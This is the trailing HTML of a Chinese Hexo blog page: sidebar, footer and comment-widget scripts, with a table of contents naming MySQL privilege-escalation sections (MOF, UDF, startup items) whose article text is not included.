class="headline">标签</div><div class="length-num">22</div></a></div><div class="card-info-data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">45</div></a></div></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/baiker" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="/baiker@qq.com" target="_blank" title="Email"><i class="fas fa-envelope"></i></a></div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#MySQL%E6%8F%90%E6%9D%83"><span class="toc-number">1.</span> <span class="toc-text">MySQL提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2MySQL%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81"><span class="toc-number">2.</span> <span class="toc-text">查询MySQL账号密码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MOF%E6%8F%90%E6%9D%83"><span class="toc-number">3.</span> <span class="toc-text">MOF提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#UDF%E6%8F%90%E6%9D%83"><span class="toc-number">4.</span> <span class="toc-text">UDF提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%AF%E5%8A%A8%E9%A1%B9%E6%8F%90%E6%9D%83"><span class="toc-number">5.</span> <span class="toc-text">启动项提权</span></a></li></ol></div></div></div></div></main><footer id="footer" style="background-image: url('https://baiker.top/img/wallhaven-gj977q.png')"><div id="footer-wrap"><div class="copyright">©2020 - 2023 By BaiKer</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.js"></script><div class="js-pjax"><script>function loadValine () {
function initValine () {
const valine = new Valine(Object.assign({
el: '#vcomment',
appId: 'B4CWJLUwBNNEjD2SoNxuy03K-gzGzoHsz',
appKey: '6vo75MB0241puEkTNHhBsuv9',
avatar: 'monsterid',
serverURLs: '',
emojiMaps: "",
path: window.location.pathname,
visitor: false
}, null))
}
if (typeof Valine === 'function') initValine()
else getScript('https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js').then(initValine)
}
if ('Valine' === 'Valine' || !false) {
if (false) btf.loadComment(document.getElementById('vcomment'),loadValine)
else setTimeout(loadValine, 0)
} else {
function loadOtherComment () {
loadValine()
}
}</script></div><link rel="stylesheet" href="https://baiker.top/css/custom.css"><script id="click-heart" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/click-heart.min.js" async="async" mobile="false"></script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>